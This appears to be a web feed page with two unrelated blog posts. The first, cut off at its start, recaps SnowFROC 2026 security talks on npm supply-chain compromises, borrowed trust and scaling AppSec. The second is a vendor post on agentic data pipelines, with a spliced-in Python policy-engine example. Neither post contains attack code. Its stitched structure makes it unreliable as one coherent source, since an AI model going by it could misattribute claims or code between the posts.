id="trust-has-become-a-supply-chain-primitive"><strong>Trust Has Become a Supply Chain Primitive</strong></h2><p><a href="https://www.linkedin.com/in/chris-lindsey-39b3915?ref=blog.gitguardian.com"><u>Chris Lindsey, Field CTO at OX Security</u></a>, started his talk, "Inside the Modern Threat Landscape: Attacker Wins, Defender Moves, and Your Priorities," with a reminder that choosing not to act is still a choice. 
In today’s threat landscape, a small set of attack vectors keeps showing up in outsized breaches, including credential theft, session hijacking, phishing, typosquatting, browser extensions, DNS poisoning, and software that appears to come from trusted sources. The common thread is trust. Attackers do not usually break in by brute force alone; instead, they build credibility first through a convincing email, a familiar package name, or a browser extension that looks legitimate on the surface. </p><p>Chris asked us to think about the question security leaders are asked by boards all the time and often struggle to answer: what did we actually get for this investment? We need a more disciplined framework for evaluating security spending based on risk reduction per dollar. That means asking better questions up front: what threat does this control address, what does it really cost once licensing, implementation, staffing, and maintenance are included, and what measurable reduction in exposure does it create? This is how you get to structured decision-making. When security teams can explain why one control was prioritized over another in terms that leadership understands, the conversation changes from vague reassurance to defensible tradeoffs.</p><p>If software and packages are still being pulled in freely, if extensions get broad permissions without scrutiny, and if reviews stop at surface-level validation, the pipeline stays open to abuse. Chris walked through examples that looked benign at first glance but revealed patterns of Trojan behavior, suspicious permissions, deceptive imports, callback infrastructure, and signs of rushed or obfuscated code. Prioritization is key. </p><p>He gave practical advice we could implement immediately: scan software before use, review open source with stronger technical oversight, pin safe packages, and introduce cooldown periods. 
We must adopt a posture in which we rotate keys aggressively, sever malicious command-and-control connections urgently, and embrace AI to scale analysis where it adds real value. Attackers are operating in the real world and have no intention of reading your threat model. Your defenses need to be just as practical and reality-based.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-8f9ce2b3-f9b8-4cbd-a00b-c76b372e776b.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753"><figcaption><span style="white-space: pre-wrap;">Chris Lindsey</span></figcaption></figure><h2 id="npm%E2%80%99s-crisis-is-really-an-operations-story"><strong>npm’s Crisis Is Really an Operations Story</strong></h2><p>In her session, "npm's dark side: Preventing the next Shai-Hulud," <a href="https://www.linkedin.com/in/jenngile?ref=blog.gitguardian.com"><u>Jenn Gile, founder of OpenSourceMalware.com</u></a>, presented the last year of npm account takeovers and package compromises as a lesson in how malware now rides normal engineering behavior. Jenn drew a sharp line between two kinds of software risk: accidental vulnerabilities and intentionally malicious packages. A vulnerability is a flaw that can be exploited if an attacker has a viable path. 
Malicious software is built from the start to cause harm, often by targeting developers and build environments directly, and it does not always need the same kind of runtime path to do damage. Malicious code does rely, though, on abusing trust. When trust is the vector, the usual instinct to stay on the latest version can become part of the problem.</p><p>The heart of the session was account takeover (ATO) and why npm remains such an attractive target. Install scripts still run by default, and provenance is not mandatory. Long-lived publishing tokens remain common. In practice, that means attackers do not always need to break the package ecosystem itself. They can hijack trust that already exists. Jenn walked through a string of compromises from 2025 into 2026, including phishing campaigns, typosquatted domains, spoofed maintainer emails, CI and GitHub Actions token theft, and follow-on attacks that used stolen secrets to widen the blast radius. The throughline across cases like Nx, Qix, <a href="https://blog.gitguardian.com/shai-hulud-2/"><u>Shai-Hulud</u></a>, <a href="https://blog.gitguardian.com/team-pcp-snowball-analysis/"><u>TeamPCP</u></a>, and Axios was not just a technical weakness. It was how easily trusted maintainers, trusted packages, and trusted upgrade habits could be turned against the people relying on them.</p><p>Jenn explained that hardware keys help protect the human authentication path, while trusted publishing helps protect the machine path by tying publication to a specific GitHub Actions identity. Session-based authentication can reduce exposure windows, even if it does not eliminate the risk of phishing. However, strong controls only work if teams actually use them, and right now, friction and bias still get in the way.</p><p>Jenn's advice was to treat malware prevention as a team sport across development, product security, cloud security, and incident response. 
Use lockfiles, avoid automatic upgrades, scrutinize lifecycle scripts, harden CI, scan for malware earlier, rotate and scope credentials, monitor for misuse, and build supply chain playbooks that account for how malware behaves differently from ordinary vulnerabilities, especially in the JavaScript and Python ecosystems.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-9a5b7271-e518-415c-a8fe-141df547adab.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753" srcset="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/size/w600/2026/04/data-src-image-9a5b7271-e518-415c-a8fe-141df547adab.png 600w, https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-9a5b7271-e518-415c-a8fe-141df547adab.png 1000w" sizes="auto, (min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Jenn Gile</span></figcaption></figure><h2 id="scale-comes-from-systems-not-heroics"><strong>Scale Comes From Systems, Not Heroics</strong></h2><p>In the final talk of the day, "Scaling AppSec through humans &amp; agents," <a href="https://www.linkedin.com/in/mudita-khurana-87b72442/?ref=blog.gitguardian.com"><u>Mudita Khurana, an Airbnb staff security engineer</u></a>, presented a model for handling a world where code volume is rising fast, AI tools are now common, and meaningful portions of code are being produced outside the old IDE-centered workflow. She explained her company is seeing more code, more contributors, and far more code generated with AI than even a few years ago. 
Today nearly all pull request authors are using AI coding tools weekly, a meaningful amount of code is now written by non-engineers outside the IDE, and a large share of total code is AI-generated. Mudita explained you cannot keep up by adding manual review alone. Their response is a layered one: unified tooling to create consistency, LLM agents to extend coverage, and a human network to bring judgment and context where automation still falls short.</p><p>A single security CLI acts as the abstraction layer over capabilities like static analysis, software composition analysis, secrets detection, and infrastructure-as-code scanning, with the same experience, exemptions, and metrics no matter where it runs. That lets security checks show up across the developer workflow, from lightweight pre-commit feedback to fuller pull request scans and post-merge coverage. </p><p>On top of that, the team is using AI for security review in a more grounded way than generic prompting. Instead of asking a model for a broad security pass, they feed it security requirements as code, along with internal frameworks, auth models, and known anti-patterns. They also measure prompt changes against a dataset built from real historical vulnerabilities, which gives them a baseline for whether the agents are actually improving.</p><p>The part of their plan that Mudita was the most excited to share was their security champions program. They do not treat this program as volunteer side work. It is tied to the engineering career ladder, backed by real responsibilities, and supported with a two-way flow of data between security and the orgs doing the work. These champions help write custom rules, triage findings, support risk assessments, and drive adoption because they understand the business context in a way central security teams often cannot. 
They have created a feedback loop where human insight improves the tools, the tools improve the signal, and prevention gradually moves earlier, into the IDE, into AI prompts, and into the default way code gets written.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-6417a808-7d7c-4078-abe8-5bafd5d0ab0b.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753" srcset="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/size/w600/2026/04/data-src-image-6417a808-7d7c-4078-abe8-5bafd5d0ab0b.png 600w, https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-6417a808-7d7c-4078-abe8-5bafd5d0ab0b.png 1000w" sizes="auto, (min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Mudita Khurana</span></figcaption></figure><h2 id="security-that-lives-where-decisions-happen">Security that lives where decisions happen</h2><p>One pattern ran through almost every strong session: security works best when it shows up at the point of action. In an IDE. In a pull request. In a package policy. In a browser extension review. In a token issuance flow. In a prompt used by an AI assistant. Teams still lose time when secure guidance lives in a wiki, a yearly training deck, or a control that runs too late to influence the original choice.</p><p>That shift sounds simple, but it changes program design. It favors lightweight friction, contextual signals, paved paths, and small reminders over large annual campaigns. 
It also favors security teams that can collaborate with developer platforms, identity teams, and cloud teams instead of operating as a separate review function.</p><h3 id="the-new-perimeter-is-made-of-borrowed-trust"><strong>The new perimeter is made of borrowed trust</strong></h3><p>Modern software development depends on borrowed trust. Developers trust registries, packages, maintainers, AI suggestions, browser tools, and automation pipelines. Organizations trust tokens, runners, integrations, and service accounts to behave within expected bounds. Attackers know that every one of those relationships can be bent.</p><p>That has direct implications for secrets management and non-human identities. A stolen token, an over-scoped credential, or a poisoned dependency can move through trusted systems much faster than traditional controls were built to handle. The answer is tighter provenance, shorter credential lifetimes, stronger attestation, clearer ownership, and continuous review of the trust assumptions hiding inside delivery pipelines.</p><h3 id="maturity-now-means-feedback-loops"><strong>Maturity now means feedback loops</strong></h3><p>Another persistent theme was the need to focus on creating feedback loops. Behavioral nudges need measurement to know how to improve them. Threat prioritization needs cost and impact models to claim success. AI review needs evaluation against real defects to be meaningful. Supply chain response needs intelligence, containment, and recovery steps that teams can actually execute.</p><p>Mature AppSec programs increasingly look like systems that learn. They collect signals, improve defaults, refine detections, tighten identity boundaries, and push lessons back into the places where code and infrastructure are created. 
The organizations that do this well will handle AI-generated code, secrets sprawl, and NHI governance with more control because they have already built the habit of turning incidents and friction into better operating models.</p><h2 id="mile-high-city-learnings"><strong>Mile High City Learnings</strong></h2><p>SnowFROC 2026, which happens at the highest altitude of any OWASP event, felt grounded in the best way. Talks treated security as daily operating design that focused on how people are rewarded, how trust is granted, how credentials spread, and how teams scale judgment without burning out the humans in the loop. Your author was able to give a talk about how we moved from slow waterfall-based deployment to a world of DevOps where we have never deployed more, faster. We have a golden opportunity as we adopt AI across our tool chains to rethink authentication in a meaningful way that might just reverberate through all our stacks of non-human identities. That is the feedback loop we can all benefit from.</p><p>For teams thinking about identity risk, secrets exposure, and the governance of machine-driven development, SnowFROC offered a useful path forward. Start with defaults. Reduce silent trust. Treat credentials and dependencies as live operational risk. Then build feedback loops that make the next secure decision easier than the last one. 
That is a practical agenda, and after a snowy spring day in Denver, it also feels achievable.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://blog.gitguardian.com/">GitGuardian Blog - Take Control of Your Secrets Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Dwayne McDaniel">Dwayne McDaniel</a>. Read the original post at: <a href="https://blog.gitguardian.com/snowfroc-2026/">https://blog.gitguardian.com/snowfroc-2026/</a></p>

Agentic Data Pipelines: The Shift to Autonomous Data Engineering

  • None
  • Published date: 2026-04-22 00:00:00

None

<p>Data engineering is no longer about building pipelines that follow instructions. It is about building systems that think, adapt, and fix themselves. The traditional model of static workflows, manual monitoring, and reactive debugging is breaking under the pressure of modern data scale and speed.</p><p><a href="https://www.ishir.com/blog/320339/ai-native-marketing-is-here-its-not-the-next-destination.htm">Agentic data pipelines</a> change that completely. They replace rigid processes with autonomous systems powered by AI agents that can observe, reason, act, and learn in real time. Instead of waiting for engineers to intervene, these pipelines make decisions on their own, handle failures as they happen, and continuously improve from experience.</p><p>This shift is not theoretical. It is already redefining how data platforms are built and operated in 2026. In this blog, we break down how agentic pipelines work, what makes them different, and how teams can start adopting them without unnecessary risk.</p><h2>What Are Agentic Data Pipelines?</h2><p>Traditional data pipelines follow fixed instructions. <a href="https://www.ishir.com/blog/319236/how-to-prepare-your-business-for-ai-a-workflow-first-approach.htm">Engineers define workflows</a>, schedule jobs, and fix failures manually. Agentic pipelines remove that rigidity. They are AI-driven systems that can reason, plan, act, and learn without constant human input. In 2026, this is no longer experimental. Most new data infrastructure is being created and managed by <a href="https://www.ishir.com/artificial-intelligence.htm">AI agents</a>, not humans.</p><h2>The Six Layers of an Agentic Pipeline: How Intelligence Is Built Into Data Systems</h2><p><strong>1. Intent Layer</strong><br> The intent layer defines the purpose of the pipeline instead of just the steps. It captures business goals, data consumers, and expectations around freshness, accuracy, and reliability. 
This allows the system to prioritize decisions dynamically based on outcomes, not instructions. Without intent, the pipeline cannot adapt and simply executes blindly.</p><p><strong>2. Observability Layer</strong><br> The observability layer provides continuous visibility into pipeline health, <a href="https://www.ishir.com/blog/126517/why-investing-in-quality-analysts-is-investing-in-your-future.htm">data quality</a>, and system performance. It tracks metrics like failures, schema drift, anomalies, and SLA breaches in real time. These signals act as the foundation for decision-making. Without strong observability, the system lacks awareness and cannot respond effectively.</p><p><strong>3. Reasoning Engine</strong><br> The reasoning engine is the decision-making core that interprets signals and determines the right course of action. It performs root cause analysis, evaluates possible fixes, and selects the best response based on context. This eliminates generic reactions and replaces them with intelligent, situation-aware decisions. It is what makes the pipeline autonomous instead of reactive.</p><p><strong>4. Action Layer</strong><br> The action layer executes decisions directly within the system by interacting with orchestration tools and infrastructure. It can restart jobs, scale resources, modify queries, or isolate faulty data. This layer ensures that decisions are not just theoretical but actually implemented in production. Speed and reliability of execution define its effectiveness.</p><p><strong>5. Memory Layer</strong><br> The memory layer stores past incidents, decisions, and outcomes to improve future responses. It allows the system to learn from recurring issues and resolve them faster over time. Instead of re-analyzing every problem, the pipeline builds operational intelligence. This continuous learning is what drives long-term efficiency and resilience.</p><p><strong>6. 
Governance Layer</strong><br> The governance layer enforces policies, controls, and compliance boundaries for all actions. It defines what can be automated, what requires approval, and ensures every decision is logged and traceable. This layer builds trust by balancing autonomy with control. Without governance, the system risks making unchecked changes in production.</p><h2>AI-Driven Pipeline Automation Loop: From Detection to Self-Healing</h2><p>Agentic pipelines operate on a continuous loop that enables real-time decision-making and self-healing without human intervention. Each step in the loop plays a distinct role in maintaining and improving the system.</p><ul> <li><strong>Observe</strong><br> Continuously monitors system signals, including logs, metrics, data quality, schema changes, and performance indicators. This step ensures the pipeline has full visibility into both data and infrastructure conditions in real time.</li> <li><strong>Reason</strong><br> Analyzes the observed signals to identify root causes of issues. It differentiates between transient errors and deeper systemic problems, then determines the most effective course of action based on context and intent.</li> <li><strong>Act</strong><br> Executes the chosen response directly within the system. This could involve retrying jobs, scaling resources, modifying queries, or isolating problematic data to prevent downstream impact.</li> <li><strong>Remember</strong><br> Stores the incident, decision, and outcome as part of the system’s memory. This enables faster and more accurate handling of similar issues in the future, improving performance over time.</li> </ul><h2>AI-Powered Self-Healing Pipelines for Data Reliability</h2><p>Self-healing is the immediate payoff. Engineers currently spend a large portion of time identifying and fixing issues. 
Agentic systems eliminate most of that effort.</p><p><strong>Failure scenarios and autonomous responses</strong></p><p><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-320924" src="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-4.png" alt="" width="740" height="432" srcset="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-4.png 740w, https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-4-300x175.png 300w" sizes="(max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 984px) 61vw, (max-width: 1362px) 45vw, 600px"></p><h2>Autonomous Data Pipeline Generation: AI-Driven Pipeline Creation from Intent</h2><h4><strong>Autonomous Pipeline Generation</strong></h4><p>Beyond self-healing, agentic systems can generate entire pipeline components from natural language specifications or by analyzing raw data patterns. Tools like Databricks Genie Code (launched March 2026) and Snowflake Cortex Code represent the leading edge of this capability.</p><p>Genie Code reasons through problems, plans multi-step approaches, writes and validates production-grade code, and maintains the result — all while keeping humans in control of the decisions that matter. On real-world data science tasks, it more than doubled the success rate of leading coding agents from 32.1% to 77.1%.</p><p><strong><u>Example: Agent-generated dbt model</u></strong></p><p><a href="https://www.ishir.com/data-ai-acceleration.htm">Data transformation agents</a> can analyze raw data patterns and automatically suggest and generate dbt models and tests that are aligned with organizational best practices. 
Here is what agent-assisted pipeline generation looks like:</p><p><img decoding="async" class="alignnone size-full wp-image-320929" src="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-5.png" alt="AI-First Products " width="740" height="432" srcset="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-5.png 740w, https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-5-300x175.png 300w" sizes="(max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 984px) 61vw, (max-width: 1362px) 45vw, 600px"></p><h2>Multi-Agent Data Pipeline Orchestration: Coordinating AI Agents for Scalable, Autonomous Data Engineering</h2><p>Modern agentic pipelines do not rely on a single AI agent. They operate as coordinated systems of specialized agents, each responsible for a specific function within the data lifecycle. This approach mirrors how high-performing data teams work, but executes at machine speed with continuous coordination and no handoffs.</p><p>At the center is the <a href="https://www.ishir.com/ai-agent-orchestration-services.htm">orchestrator agent</a>, which acts as the control layer. It assigns tasks, manages dependencies, resolves conflicts between agents, and maintains a global view of pipeline health. It ensures that all components work in sync and that decisions align with the pipeline’s intent and governance policies.</p><p><strong>Supporting it are domain-specific agents:</strong></p><ul> <li><strong>Ingestion Agents</strong> handle data intake from multiple sources. They monitor schema changes, adjust parsing logic dynamically, and ensure incoming data remains compatible with downstream systems. This reduces breakages caused by upstream changes.</li> <li><strong>Data Quality Agents</strong> continuously validate data against defined standards. They detect anomalies, enforce data contracts, quarantine bad records, and trigger corrective actions when quality thresholds are violated. 
This prevents bad data from propagating across the pipeline.</li> <li><strong>Transformation Agents</strong> generate, optimize, and maintain transformation logic. They build <a href="https://www.ishir.com/hire-mysql-developer.htm">SQL queries</a>, dbt models, and feature engineering workflows while continuously improving performance and efficiency based on usage patterns.</li> </ul><p>The real complexity lies in coordination. These agents often operate on overlapping responsibilities and shared resources. The orchestration layer must manage dependencies, prioritize tasks, and resolve conflicts in real time. For example, a quality agent may flag an issue while a transformation agent is mid-execution. The orchestrator decides whether to pause, reroute, or continue processing based on impact and policy.</p><p>This multi-agent architecture enables parallel execution, faster recovery, and higher system resilience. Instead of a single point of failure, intelligence is distributed across multiple agents that collaborate continuously. The result is a data pipeline that is not just automated, but coordinated, adaptive, and scalable by design.</p><h2>Governance, Trust &amp; the Human-in-the-Loop</h2><p>The most common objection to agentic pipelines is: how do you trust a system that modifies <a href="https://www.ishir.com/blog/42058/top-15-emerging-databases-to-use-in-2022-and-beyond.htm">production databases</a> without asking permission? The answer is Policy-Based Action Frameworks – a governance layer that defines exactly what agents can and cannot do autonomously.</p><p><strong>Policy enforcement levels:</strong></p><ul> <li>Notify only – agent identifies issue, logs it, and alerts a human. No autonomous action taken.</li> <li>Suggest – agent proposes a specific remediation with reasoning. Human reviews and approves before execution.</li> <li>Auto-approve low-risk – agent autonomously executes pre-approved actions (retries, minor schema fixes). 
Logs all actions.</li> <li>Full autonomy with audit – agent acts freely within defined policy boundaries. Every action logged with reasoning traces.</li> </ul><p>Most organizations start at ‘notify only’ and progressively unlock higher autonomy as trust in the system is established. This graduated approach is critical – it allows teams to validate the agent’s logic in shadow mode before granting write access to production systems.</p><p>As agentic operating models mature, <a href="https://www.ishir.com/hire-big-data-engineer.htm">data engineers</a> shift from hand-coding transformations to supervising autonomous systems. That means designing guardrails, reviewing agent decisions, and resolving novel edge cases. Explainability becomes core to the model: reasoning traces, auditable logs, and human-in-the-loop checkpoints are required for trust and compliance.</p><h2>AI-Powered Data Engineering Tools, Roles, and Impact</h2><h4><strong>Agentic Data Platforms</strong></h4><p><strong>Tools included:</strong> Databricks Genie Code, Snowflake Cortex Code<br> These platforms handle end-to-end pipeline generation, optimization, and deployment. They translate business intent into production-ready workflows using AI. The impact is faster development cycles, reduced manual coding, and higher consistency in pipeline design.</p><h4><strong>Pipeline Orchestration Tools</strong></h4><p><strong>Tools included:</strong> Apache Airflow, Dagster, Prefect<br> These tools manage scheduling, dependencies, and execution of <a href="https://www.ishir.com/blog/313910/ai-agent-orchestration-how-it-works-and-why-it-matters.htm">data workflows</a>. In agentic systems, they act as execution backbones where AI agents trigger reruns, adjust workflows, and optimize operations in real time. 
Their role is critical for stability and controlled execution.</p><h4><strong>Self-Healing and Observability Tools</strong></h4><p><strong>Tools included:</strong> Acceldata ADM, Monte Carlo, OpenTelemetry<br> These tools provide deep visibility into pipeline health, data quality, and system performance. They enable anomaly detection and support automated remediation through <a href="https://www.ishir.com/ai-agent-development-services.htm">agentic decision-making</a>. The impact is reduced downtime and elimination of manual debugging.</p><h4><strong>Data Transformation and AI Modeling Tools</strong></h4><p><strong>Tools included:</strong> dbt with AI agents, Spark with LLMs<br> These tools automate the creation and optimization of data transformations. They generate <a href="https://www.ishir.com/blog/317646/migrating-sql-server-to-aurora-postgresql-solving-the-real-challenges-of-cloud-database-modernization.htm">SQL models</a>, enforce <a href="https://www.ishir.com/software-testing-qa-services.htm">data tests</a>, and improve performance based on usage patterns. This reduces engineering effort while improving data reliability and scalability.</p><h4><strong>Data Governance and Lineage Tools</strong></h4><p><strong>Tools included:</strong> Unity Catalog, Apache Atlas, OpenLineage<br> These systems enforce access controls, maintain lineage, and ensure compliance. They define what actions agents can take and provide full auditability of every decision. Their impact is trust, transparency, and safe automation in production environments.</p><h4><strong>Memory and Context Stores</strong></h4><p><strong>Tools included:</strong> LanceDB, Chroma, Vector databases<br> These systems store historical context, past incidents, and decision outcomes. They allow AI agents to learn from previous scenarios and improve over time. 
The result is faster resolution of recurring issues and continuous system optimization.</p><h2>Agentic Data Pipeline Implementation Roadmap</h2><h4><strong>Step 1: Start with AI-Assisted Pipeline Development</strong></h4><p>Adopt AI coding tools like GitHub Copilot, Databricks Genie Code, or Snowflake Cortex Code to accelerate pipeline creation. This delivers immediate productivity gains without changing existing architecture. It is the lowest-risk entry point into agentic systems.</p><h4><strong>Step 2: Implement Automated Data Quality Monitoring</strong></h4><p><a href="https://www.ishir.com/hire-machine-learning-engineers.htm">Deploy ML-based data quality</a> and anomaly detection tools to replace static rules. This improves accuracy in detecting issues and significantly reduces alert fatigue. It builds the foundation for intelligent decision-making.</p><h4><strong>Step 3: Deploy Self-Healing Agents in Shadow Mode</strong></h4><p>Introduce agentic systems in “suggest only” mode where they recommend fixes but do not execute them. Monitor their decisions over a few weeks to validate accuracy and build trust. This step ensures safe evaluation before automation.</p><h4><strong>Step 4: Define Governance and Policy Frameworks</strong></h4><p>Establish clear rules for what actions can be automated and what requires human approval. Start with strict controls and gradually allow low-<a href="https://www.ishir.com/strategic-advisory-services.htm">risk autonomous actions</a>. Governance is critical to ensure safe and compliant operations.</p><h4><strong>Step 5: Enable the Autonomous Pipeline Loop</strong></h4><p>Activate the full observe-reason-act-remember loop with controlled autonomy. Allow agents to execute approved actions, learn from outcomes, and continuously improve. 
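</p><p>The policy enforcement levels described earlier (notify only, suggest, auto-approve low-risk, full autonomy with audit) and the shadow-mode, governance and controlled-autonomy steps of this roadmap reduce to one small decision function. The following is an added example written for this page; it is not code from the ISHIR post or from any platform it names. The action catalogue, the risk classes, and the <code>Proposal</code> and <code>PolicyEngine</code> names are constructed for illustration. The security properties it demonstrates are that every request is checked against an explicit allowlist, that destructive actions need a named human approver at every level, and that every decision, including denials, leaves an audit record carrying the agent's reasoning trace:</p>

```python
"""Added example: a policy-based action framework for pipeline agents.
It implements the four enforcement levels (notify only, suggest,
auto-approve low risk, full autonomy with audit), keeps an explicit action
catalogue as the policy boundary, and writes every decision together with
the agent's reasoning trace to an audit log. Action names and risk classes
are constructed for illustration, not taken from any product."""
from dataclasses import dataclass, asdict
from enum import IntEnum
from typing import Callable, List, Optional
import json
import time


class Level(IntEnum):
    """Enforcement levels, from least to most autonomous."""
    NOTIFY_ONLY = 0
    SUGGEST = 1
    AUTO_LOW_RISK = 2
    FULL_AUTONOMY = 3


# Constructed policy: the only actions an agent may request at all ...
ACTION_CATALOGUE = {"retry_task", "scale_workers", "rewrite_query",
                    "quarantine_partition", "drop_table"}
# ... those pre-approved for autonomous execution at AUTO_LOW_RISK ...
LOW_RISK = {"retry_task", "scale_workers"}
# ... and those that need a named human approver at every level.
NEVER_AUTOMATE = {"drop_table"}


@dataclass
class Proposal:
    action: str
    target: str
    reasoning: str                     # the agent's reasoning trace
    approved_by: Optional[str] = None  # set once a human has signed off


@dataclass
class Decision:
    outcome: str  # notified | awaiting_approval | executed | denied
    reason: str


class PolicyEngine:
    def __init__(self, level: Level,
                 executor: Optional[Callable[[Proposal], None]] = None):
        self.level = level
        self.executed: List[Proposal] = []
        # The default executor only records the proposal; a real one would
        # call the orchestrator (Airflow, Dagster, ...) through its API.
        self.executor = executor or self.executed.append
        self.audit_log: List[dict] = []

    def requires_human(self, action: str) -> bool:
        """Does this action need a human signature at the current level?"""
        if action in NEVER_AUTOMATE:
            return True
        if self.level <= Level.SUGGEST:
            return True
        if self.level == Level.AUTO_LOW_RISK:
            return action not in LOW_RISK
        return False  # FULL_AUTONOMY: free to act within the catalogue

    def decide(self, proposal: Proposal) -> Decision:
        if proposal.action not in ACTION_CATALOGUE:
            decision = Decision("denied", "action is outside the policy boundary")
        elif self.level == Level.NOTIFY_ONLY:
            decision = Decision("notified", "notify-only: logged and alerted, nothing executed")
        elif self.requires_human(proposal.action) and not proposal.approved_by:
            decision = Decision("awaiting_approval", "needs human approval at this level")
        else:
            self.executor(proposal)
            who = proposal.approved_by or "agent"
            decision = Decision("executed", f"executed on behalf of {who}")
        # Every path, including denials, leaves a traceable record.
        self.audit_log.append({"ts": time.time(), "level": self.level.name,
                               **asdict(proposal), **asdict(decision)})
        return decision

    def export_audit(self) -> str:
        """Audit log as JSON lines, one record per decision."""
        return "\n".join(json.dumps(rec, sort_keys=True) for rec in self.audit_log)


if __name__ == "__main__":
    engine = PolicyEngine(Level.AUTO_LOW_RISK)
    engine.decide(Proposal("retry_task", "dag.extract", "transient upstream timeout"))
    engine.decide(Proposal("rewrite_query", "dag.transform", "query plan regressed 4x"))
    engine.decide(Proposal("drop_table", "stage.tmp_2026_04", "orphaned staging table"))
    print(engine.export_audit())
```

<p>Shadow mode is simply <code>Level.SUGGEST</code> wired to the production signal stream: proposals and reasoning traces accumulate in the audit log while nothing executes, which gives the team the record it needs to judge the agent's logic before raising the level. Raising the level changes only which requests skip the approval gate; the catalogue boundary and the never-automate set stay fixed, so granting autonomy never widens what the agent is allowed to do.</p><p>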
Conduct regular audits to ensure decisions remain aligned with business intent and policies.</p><h2>How ISHIR Helps You Build Agentic Data Pipelines</h2><p>ISHIR helps organizations transition from traditional data pipelines to agentic, AI-driven systems by combining Agentic AI development with deep data engineering expertise. We design and build intelligent agents, modernize pipeline architectures, and integrate observability, orchestration, and self-healing capabilities to create scalable, autonomous data platforms aligned with business outcomes.</p><p>Beyond implementation, ISHIR enables real business impact through advanced <a href="https://www.ishir.com/data-analytics.htm">data analytics</a> and hands-on <a href="https://www.ishir.com/data-ai-acceleration.htm">Data + AI workshops</a>. We help teams unlock actionable insights, define clear adoption roadmaps, and build internal capability to manage and scale agentic systems with confidence and control.</p><div class="ctaThreeWrapper"> <div class="ctaThreeContent"> <div class="ctaThreeConList"> <div class="content"> <h2 data-start="0" data-end="101">Struggling with fragile data pipelines, constant failures, and manual fixes slowing your team down?</h2> <p>ISHIR helps you build AI-powered, self-healing data pipelines that automate operations and scale with confidence.</p> <div class="linkWrapper"><a href="https://www.ishir.com/get-in-touch.htm" rel="noopener">Get Started</a></div> </div> </div> </div> </div><h2>FAQs on Agentic Data Pipelines and AI-Driven Data Engineering</h2><h4><strong>Q. What is an agentic data pipeline and how is it different from traditional pipelines?</strong></h4><p>An agentic data pipeline is an AI-driven system that can observe, reason, act, and learn without constant human intervention. Unlike traditional pipelines that follow fixed workflows, agentic pipelines adapt dynamically to changes in data, schema, and system conditions. 
They do not just execute tasks, they make decisions based on context and intent. This shift reduces manual debugging, improves reliability, and enables real-time optimization. It is a move from static automation to intelligent autonomy.</p><h4><strong>Q. How do AI agents actually improve data pipeline reliability?</strong></h4><p>AI agents improve reliability by continuously monitoring system health and data quality, then taking corrective action instantly. Instead of waiting for alerts and manual fixes, they identify root causes and resolve issues such as failures, anomalies, or schema changes in real time. They also learn from past incidents, which means recurring problems are handled faster and more accurately. This significantly reduces downtime, data inconsistencies, and operational overhead.</p><h4><strong>Q. Are agentic data pipelines safe to use in production environments?</strong></h4><p>Yes, but only when implemented with strong governance frameworks. Most organizations start with limited autonomy where agents suggest actions instead of executing them. Over time, low-risk actions like retries or scaling are automated, while critical changes still require approval. Every action is logged, traceable, and aligned with policy rules. This controlled approach ensures safety, compliance, and trust while gradually increasing automation.</p><h4><strong>Q. What are the main challenges in adopting agentic pipelines?</strong></h4><p>The biggest challenges are trust, governance, and system integration. Teams often hesitate to allow AI systems to modify production data without oversight. There is also complexity in integrating AI agents with existing orchestration, monitoring, and data systems. Another challenge is defining clear intent and policies so agents can make correct decisions. Successful adoption requires a phased approach with validation, monitoring, and gradual rollout.</p><h4><strong>Q. 
Do agentic pipelines replace data engineers?</strong></h4><p>No, they change the role of data engineers rather than replacing them. Engineers move from writing and fixing pipelines to designing systems, defining policies, and supervising AI agents. They focus more on architecture, governance, and optimization instead of repetitive operational tasks. This shift increases productivity and allows teams to handle larger, more complex data environments with fewer resources.</p><h4><strong>Q. What tools are commonly used to build AI-driven data pipelines?</strong></h4><p>The ecosystem includes agentic platforms like Databricks Genie Code and Snowflake Cortex, orchestration tools like Airflow and Dagster, and observability tools like Monte Carlo and OpenTelemetry. Transformation tools such as dbt combined with AI agents automate modeling and SQL generation. Governance tools ensure compliance, while vector databases store memory for learning. These tools work together to enable intelligent, autonomous pipeline behavior.</p><h4><strong>Q. How can organizations start implementing agentic data pipelines today?</strong></h4><p>The best approach is to start small and build progressively. Begin with AI-assisted development to speed up pipeline creation, then implement automated data quality monitoring. Introduce agentic systems in a suggestion mode to validate their decisions before enabling automation. Define governance policies early to control risk. Once trust is established, gradually activate full autonomy with continuous monitoring and audits. 
